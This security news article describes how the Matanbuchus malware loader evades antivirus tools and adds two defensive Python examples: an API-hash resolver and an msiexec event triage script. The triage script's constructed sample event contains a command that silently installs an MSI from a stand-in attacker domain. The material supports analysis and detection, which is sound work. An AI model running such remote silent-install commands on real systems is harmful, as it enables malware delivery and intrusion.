Malware in Disguise: How Matanbuchus Morphs to Outsmart Antivirus Defenses
Subtitle: The ever-evolving Matanbuchus malware is swapping its digital DNA to evade detection, putting enterprises on high alert.
It starts with a simple call from “IT support.” Soon, an employee runs what looks like a harmless update file - and in the blink of an eye, attackers slip past the company’s cyber defenses. Behind this digital sleight of hand is Matanbuchus: a chameleon-like malware that’s rewriting the rules of evasion.
Matanbuchus isn’t your average malware. Sold on the dark web as Malware-as-a-Service, it has become a favorite tool for ransomware groups and data thieves. What makes it especially dangerous? Its ability to rapidly change its internal components - code, strings, payloads - rendering static antivirus signatures nearly useless.
Researchers at Zscaler have tracked a surge in attacks where the malware is delivered through MSI files - installer packages commonly used for legitimate Windows software. These files, often hosted on attacker-controlled domains, are designed to look innocuous. When executed, they “side-load” the malicious Matanbuchus downloader DLL by piggybacking on trusted programs like HRUpdate.exe or Notepad++ updaters.
The malware’s authors lace their code with junk instructions, encrypt critical strings with the robust ChaCha20 cipher, and use hashing tricks to resolve Windows API calls. To further frustrate defenders, Matanbuchus introduces “busy loops” that delay execution - tricking sandbox analysis tools that rely on short inspection windows.
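API hashing only hides names from a string search; an analyst who recovers the hash routine from a sample can rebuild the table and translate the constants back into API names. The following is an added example, not code from Zscaler's analysis or from Matanbuchus itself: the article does not say which hash routine the malware uses, so the ROR-13 variant here is an assumption, and the export list is a constructed subset rather than a real DLL's export table.

```python
"""Resolving hashed API names during sample analysis (added example).

Not Matanbuchus' own routine: the article does not describe it. The ROR-13
hash below is an ASSUMED, commonly seen variant; an analyst substitutes the
routine recovered from the sample under study. EXPORTS is a constructed
subset, not a parsed export table.
"""


def ror13_hash(name: str) -> int:
    """Rotate-right-by-13-then-add over the ASCII bytes of a name (assumed variant)."""
    h = 0
    for b in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + b) & 0xFFFFFFFF
    return h


# Constructed subset of export names. A real table would be built by parsing the
# export directories of kernel32.dll / ntdll.dll from a clean system.
EXPORTS = [
    "CreateFileW", "VirtualAlloc", "VirtualProtect", "WriteProcessMemory",
    "CreateRemoteThread", "LoadLibraryA", "GetProcAddress", "Sleep",
    "NtQuerySystemInformation",
]


def build_lookup(names, hash_fn=ror13_hash):
    """Map hash -> export name; a silent collision would mislabel a constant, so fail loudly."""
    table = {}
    for n in names:
        h = hash_fn(n)
        if h in table and table[h] != n:
            raise ValueError(f"hash collision: {table[h]} / {n}")
        table[h] = n
    return table


def resolve(hashes, table):
    """Translate hash constants pulled from a sample back into API names."""
    return {h: table.get(h, "<unknown>") for h in hashes}


if __name__ == "__main__":
    table = build_lookup(EXPORTS)
    # Constructed "constants from a sample": hashes of two known names plus one unknown value.
    found = [ror13_hash("VirtualAlloc"), ror13_hash("CreateRemoteThread"), 0xDEADBEEF]
    for h, name in resolve(found, table).items():
        print(f"{h:#010x} -> {name}")
```

The same lookup is what a detection engineer uses to turn a list of hash constants into a YARA rule or a hunting query: once the routine is known, every hash the sample carries is a searchable indicator.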
Once inside a system, Matanbuchus gathers reconnaissance data: hostnames, operating system details, and installed security tools. It’s programmed to spot popular endpoint detection and response (EDR) software, including Bitdefender, ESET, and Symantec, and adjusts its behavior accordingly. Communication with its command-and-control (C2) servers is hidden in encrypted, base64-encoded traffic, making it difficult to spot with standard network monitoring.
The attack chain often begins with social engineering. Criminals pose as IT support via Microsoft Teams or QuickAssist, convincing victims to run “updates” that are actually booby-trapped MSI or ZIP files. After infection, Matanbuchus can deploy further malware such as stealers or remote access trojans, and pave the way for hands-on ransomware attacks. Each campaign is more sophisticated than the last, with version 3.0 now using advanced techniques like WQL queries and indirect system calls to slip past even modern EDR tools.
Defenders are urged to block known malicious domains, monitor for suspicious use of msiexec.exe, and train staff to spot phishing attempts. Signature-based detection is no longer enough - behavioral monitoring and machine learning anomaly spotting are now essential in the fight against this shape-shifting threat.
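What "monitor for suspicious use of msiexec.exe" looks like in practice is a small set of rules over process-creation telemetry. The script below is an added example, not detection content from Zscaler or any vendor: it parses constructed, Sysmon-style `EventID=1` lines (the field names, sample events and the blocklist domain are all made up for this illustration) and flags msiexec launches that install straight from a URL, from a user-writable folder, or silently, and cross-checks any URL host against a domain blocklist.

```python
"""Triage of msiexec.exe process-creation events (added example).

Illustrative only, not vendor detection content. The key=value log format,
the sample events and the blocklist entry are constructed for this example.
"""
import re
from urllib.parse import urlparse

# Constructed Sysmon-style EventID 1 records; not real telemetry.
SAMPLE_EVENTS = [
    'EventID=1 Image=C:\\Windows\\System32\\msiexec.exe '
    'CommandLine="msiexec.exe /i https://updates.bad-domain.example/HRUpdate.msi /qn" '
    'ParentImage=C:\\Users\\alice\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe',
    'EventID=1 Image=C:\\Windows\\System32\\msiexec.exe '
    'CommandLine="msiexec.exe /i C:\\Users\\alice\\Downloads\\update.msi /quiet" '
    'ParentImage=C:\\Windows\\explorer.exe',
    'EventID=1 Image=C:\\Windows\\System32\\msiexec.exe '
    'CommandLine="msiexec.exe /i C:\\ProgramData\\Vendor\\app.msi" '
    'ParentImage=C:\\Windows\\CCM\\Ccmexec.exe',
    'EventID=1 Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe" '
    'ParentImage=C:\\Windows\\explorer.exe',
]

# Constructed blocklist; in production this is fed from threat intelligence.
BLOCKED_DOMAINS = {"updates.bad-domain.example"}

QUIET_FLAGS = {"/q", "/qn", "/qb", "/quiet", "/passive"}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(downloads|appdata)\\|\\temp\\", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)


def parse_event(line: str) -> dict:
    """Split a key=value line into a dict; quoted values keep their spaces."""
    fields = {}
    for key, value in re.findall(r'(\w+)=("[^"]*"|\S+)', line):
        fields[key] = value.strip('"')
    return fields


def msiexec_reasons(fields: dict) -> list:
    """Reasons an msiexec.exe event looks suspicious; empty list if none (or not msiexec)."""
    image = fields.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image != "msiexec.exe":
        return []
    cmd = fields.get("CommandLine", "")
    reasons = []
    m = URL_RE.search(cmd)
    if m:
        reasons.append("remote-url")  # package fetched directly from the internet
        host = (urlparse(m.group(0)).hostname or "").lower()
        if host in BLOCKED_DOMAINS:
            reasons.append("blocked-domain")
    if USER_WRITABLE.search(cmd):
        reasons.append("user-writable-source")  # Downloads, AppData, Temp
    if any(tok.lower() in QUIET_FLAGS for tok in cmd.split()):
        reasons.append("quiet-install")  # no UI shown to the user
    return reasons


def triage(lines):
    """Map line index -> reasons, including only the lines that were flagged."""
    findings = {}
    for i, line in enumerate(lines):
        reasons = msiexec_reasons(parse_event(line))
        if reasons:
            findings[i] = reasons
    return findings


if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(reasons)}")
```

Each rule on its own produces noise (software deployment tools also run quiet installs), so the value is in the combination: a quiet install from a URL launched under a collaboration or remote-assistance client is the pattern the article describes, and is worth an alert even when the domain is not yet on a blocklist.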
As Matanbuchus continues to adapt, it’s a stark reminder that in cybercrime, nothing stays static for long. The battle between attackers and defenders is escalating - and only those who evolve can hope to survive.
WIKICROOK
- Malware: Malware is malicious software designed to infiltrate, damage, or steal data from computing devices without the user’s consent.
- DLL Side-loading: DLL side-loading is a technique where attackers trick programs into loading malicious DLL files, bypassing security and gaining unauthorized access or control.
- ChaCha20: ChaCha20 is a fast, secure encryption algorithm that scrambles data to protect it from unauthorized access, widely used in modern cybersecurity.
- API Hashing: API Hashing hides Windows system calls by replacing their names with coded hashes, making it harder for security tools to detect malicious activity.
- Process Hollowing: Process hollowing is a technique where malware hides in a legitimate program’s memory, allowing it to evade detection and execute malicious actions.